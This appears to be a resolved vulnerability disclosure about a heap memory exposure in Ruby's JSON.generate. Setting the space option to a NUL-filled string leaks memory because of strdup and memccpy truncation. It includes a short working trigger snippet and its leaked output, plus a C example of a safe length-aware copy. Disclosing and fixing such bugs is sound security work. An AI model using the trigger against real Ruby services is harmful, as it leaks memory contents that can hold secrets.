
Arbitrary heap exposure in JSON.generate

Ruby
Reported by ahmadsherif

Vulnerability Details

Technical details and impact analysis

Memory Corruption - Generic
Running this snippet can expose arbitrary memory:

```ruby
require 'json'

state = JSON.state.new
state.space = "\0" * 1024   # 1024 bytes long, but strdup() stops at the first NUL
puts JSON.generate({a: :b}, state)
```

```
{"a": psych/handlers/recorder.rb tensi0 reeze) Gem::Specification.new do |s| # to objects of the same type as the original delegate. mydata/scm/git/ruby/dist/lib/ruby/2.5.0/json/ext.rb pass the namP See http://guides.rubygems.org/specification-reference/ for help # # constant and class member data initialization... "b"}
```

The issue lies in using `strdup` in [generator.c](https://github.com/ruby/ruby/blob/trunk/ext/json/generator/generator.c#L1103), which will stop after encountering a NULL byte, returning a pointer to a zero-length string, which is not the length stored in `space_len`. Eventually `fbuffer_append` will copy the length of the string (e.g. the 1024 above) into the generated buffer.

Simpler snippets like `JSON.generate({foo: "bar"}, space: "\0" * 1024)` suffer from the same issue but for a slightly different reason: `fstrndup` is using [memccpy](https://github.com/ruby/ruby/blob/trunk/ext/json/generator/generator.c#L311), which will, again, stop copying after encountering a NULL byte, returning a pointer to a zero-length string.
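To make the length mismatch concrete, here is an added C example (my own illustration, not the json gem's code or the upstream fix): a NUL-terminated copy such as `strdup` keeps only the bytes before the first NUL, while a length-aware copy keeps every byte the caller's stored length says it has. The function names `copy_with_len`, `bytes_kept_by_strdup` and `copy_is_faithful` are assumptions for this example.

```c
/* Added example, not the json gem's code: contrast a terminator-based
 * copy (the bug pattern) with a length-aware copy (the safe pattern). */
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <string.h>

/* Safe pattern: copy exactly `len` bytes and never search for a
 * terminator, so embedded NUL bytes survive and the allocation size
 * always matches the length the caller will later pass to an append. */
static char *copy_with_len(const char *ptr, size_t len) {
    char *out = malloc(len ? len : 1);
    if (out == NULL) return NULL;
    memcpy(out, ptr, len);
    return out;
}

/* Bug pattern: strdup() stops at the first NUL. For a source like
 * "\0" * 1024 it allocates a single byte, yet the caller still records
 * the original length (space_len), so a later append reads past the
 * allocation. Returns how many bytes strdup actually preserved. */
static size_t bytes_kept_by_strdup(const char *ptr) {
    char *dup = strdup(ptr);
    if (dup == NULL) return 0;
    size_t kept = strlen(dup);
    free(dup);
    return kept;
}

/* Check worth keeping next to any such copy: the duplicate must hold
 * `len` bytes identical to the source, NULs included. 1 = ok, 0 = lost. */
static int copy_is_faithful(const char *src, size_t len) {
    char *dup = copy_with_len(src, len);
    int ok = (dup != NULL) && memcmp(dup, src, len) == 0;
    free(dup);
    return ok;
}
```

With the constructed input `"ab\0cd"` (five bytes), `bytes_kept_by_strdup` reports 2 while `copy_is_faithful` confirms all five bytes survived the length-aware copy.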

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Weakness

Memory Corruption - Generic